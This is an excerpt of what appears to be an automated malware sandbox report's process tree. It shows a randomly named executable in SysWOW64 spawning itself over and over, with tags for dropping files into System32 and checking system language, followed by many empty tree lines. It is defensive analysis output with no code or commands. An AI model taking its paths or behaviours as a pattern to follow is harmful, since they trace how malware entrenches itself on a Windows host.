C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe118⤵
- Drops file in System32 directory
PID:5572 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe119⤵PID:5592
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe120⤵
- System Location Discovery: System Language Discovery
PID:5612 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe121⤵PID:5632
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-